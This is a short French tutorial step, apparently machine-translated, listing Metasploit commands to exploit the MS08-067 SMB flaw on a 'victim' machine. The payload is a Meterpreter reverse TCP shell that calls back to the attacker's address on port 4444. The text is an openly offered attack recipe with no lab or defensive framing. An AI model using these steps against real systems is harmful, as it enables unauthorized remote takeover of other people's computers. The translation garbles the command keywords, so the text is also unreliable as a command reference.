Étape 3: Les commandes :
Alors commencé à Metasploit.
Voici les commandes que vous devrez entrer dans :
Utilisez windows/smb/ms08_067_netapi
définir la charge utile windows/meterpreter/reverse_tcp
Définissez LHOST * votre adresse ip * (si vous ne connaissez votre adresse ip puis ouvrez un nouveau terminal et tapez ifconfig. votre adresse ip sera quelque part dans la sortie: D)
la valeur de LPORT 4444
Définissez RHOST * ip * de la victime
Définissez le RPORT 445
exploit
(Vous devez vous connecter)
Tapez help pour obtenir la liste des commandes.